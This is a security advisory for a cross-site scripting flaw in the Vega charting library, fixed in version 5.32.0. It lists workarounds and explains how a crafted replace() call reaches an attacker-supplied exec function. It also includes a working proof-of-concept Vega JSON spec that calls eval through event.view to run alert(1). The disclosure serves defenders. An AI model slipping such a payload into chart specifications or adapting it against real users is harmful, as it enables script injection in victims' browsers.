GHSA-963h-3v39-3pqf
Vega vulnerable to Cross-site Scripting via RegExp.prototype[@@replace]
Quick fix
GHSA-963h-3v39-3pqf — vega: upgrade to the fixed version with the command below.
npm install vega@5.32.0Details
## Impact
Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the `vega-interpreter`.
## Workarounds
- Use `vega` with [expression interpreter](https://vega.github.io/vega/usage/interpreter/) - Upgrade to a [newer Vega version](https://github.com/vega/vega/releases/tag/v5.32.0) (`5.32.0`)
### POC Summary
Calling `replace` with a `RegExp`-like pattern calls `RegExp.prototype[@@replace]`, which can then call an attacker-controlled `exec` function.
### POC Details
Consider the function call `replace('foo', {__proto__: /h/.constructor.prototype, global: false})`. Since `pattern` has `RegExp.prototype[@@replace]`, `pattern.exec('foo')` winds up being called.
The resulting malicious call looks like this: ``` replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false}) ```
Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse `event.view` to gain access to `eval`.
### Reproduction steps
``` {"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]} ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://github.com/vega/vega/security/advisories/GHSA-963h-3v39-3pqf[WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-27793[ADVISORY]
- https://github.com/vega/vega/commit/694560c0aa576df8b6c5f0f7d202ac82233e6966[WEB]
- https://github.com/vega/vega[PACKAGE]
- https://github.com/vega/vega/releases/tag/v5.32.0[WEB]
- https://vega.github.io/vega/usage/interpreter[WEB]